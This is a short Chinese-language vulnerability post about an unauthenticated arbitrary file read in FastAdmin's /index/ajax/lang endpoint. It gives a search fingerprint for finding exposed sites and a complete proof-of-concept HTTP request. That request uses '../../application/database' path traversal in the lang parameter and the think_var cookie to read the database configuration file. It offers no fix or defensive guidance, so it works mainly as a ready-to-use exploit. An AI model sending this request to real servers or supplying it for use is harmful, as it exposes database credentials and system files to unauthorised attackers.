漏洞简介

FastAdmin后台框架开源且可以免费商用，一键生成 CRUD,FastAdmin是一款基于ThinkPHP 和 Bootstrap 的极速后台开发框架，基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图JS、语言包、菜单、回收站等。FastAdmin框架的lang接口存在任意文件读取漏洞，该漏洞允许未授权攻击者通过构造特定请求读取系统敏感文件，如数据库配置文件、系统配置文件等。

body="/assets/js/require.js"

漏洞复现

POC

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_var=..%2F..%2Fapplication%2Fdatabase; PHPSESSID=m0lgoj6m4hovmtisu1868cc8h5
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache